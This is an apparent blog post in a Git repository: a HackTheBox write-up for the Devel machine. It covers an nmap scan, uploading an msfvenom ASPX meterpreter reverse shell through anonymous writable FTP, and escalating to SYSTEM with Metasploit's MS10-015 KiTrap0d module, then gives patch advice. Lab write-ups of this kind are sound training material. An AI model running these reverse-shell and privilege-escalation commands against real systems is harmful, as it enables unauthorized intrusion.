d3vyce/blog
1
0
Fork 0
Code Issues 1 Pull Requests Actions Packages Projects Releases Wiki Activity
blog/content/writeup-ctf/writeup-devel-htb/index.md
d3vyce 095a13b2c9
Some checks failed
Build Blog Docker Image / build docker (push) Failing after 1m11s
Details
add: writeup-ctf
2024-03-02 21:49:07 +01:00

102 lines
2.3 KiB
Markdown
Raw Blame History

---
title: "Writeup - Devel (HTB)"
date: 2022-04-06
slug: "writeup-devel-htb"
type: "writeup-ctf"
---
This is a writeup for the [Devel](https://app.hackthebox.com/machines/Devel) machine from the HackTheBox site.
## Enumeration
First, let's start with a scan of our target with the following command:
```bash
nmap -sV -T4 -Pn 10.10.10.5
```
Two TCP ports are discovered:
![](img/image-1.webp)
- 21/tcp : FTP (ftpd)
- 80/tcp : HTTP web server (Apache 2.4.41)
![](img/image-2.webp)
## Exploit
I start by seeing if it is possible to connect to FTP as `anonymous`:
![](img/image-3.webp)
In addition to being able to read, we have the ability to write, so I create a payload to make a reverse shell with the following command:
```bash
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.9 LPORT=1234 -f aspx -o shell.aspx
```
I upload it then with the help of Metasploit I launch a TCP handler to create a meterpreter.
![](img/image-4.webp)
I then access my previously uploaded payload at the following address:
```bash
http://10.10.10.5/shell.aspx
```
I now have a reverse shell on the machine.
## Privilege escalation
I pause the meterpreter with CRTL+Z. Then to try to determine some feats, I use the following module on Metasploit.
```bash
use post/multi/recon/local_exploit_suggester
set SESSION 19
exploit
```
The module has found a number of potential exploits.
![](img/image-5.webp)
I start by testing the first one:
```bash
use windows/local/bypassuac_eventtvwr
set SESSION 19
exploit
```
![](img/image-6.webp)
But without success. I test the second one:
```bash
use windows/local/ms10_015_kitrap0d
set SESSION 19
exploit
```
![](img/image-7.webp)
This one worked, I now have a reverse shell with the `NT AUTHORITY\SYSTEM` authorization.
The module `MS10_015` is linked to CVE-2010-0232.
> [...] when access to 16-bit applications is enabled on a 32-bit x86 platform, does not properly validate certain BIOS calls, which allows local users to gain privileges [...] [VK9 Security](https://vk9-sec.com/kitrap0d-windows-kernel-could-allow-elevation-of-privilege-ms10-015-cve-2010-0232/)
I can now get both flags back.
![](img/image-8.webp)
## Recommendations
To patch this host I think it would be necessary to perform a number of actions:
- Disable writing to the FTP server as `anonymous`
- Update Windows to patch CVE-2010-0232
Reference in New Issue View Git Blame Copy Permalink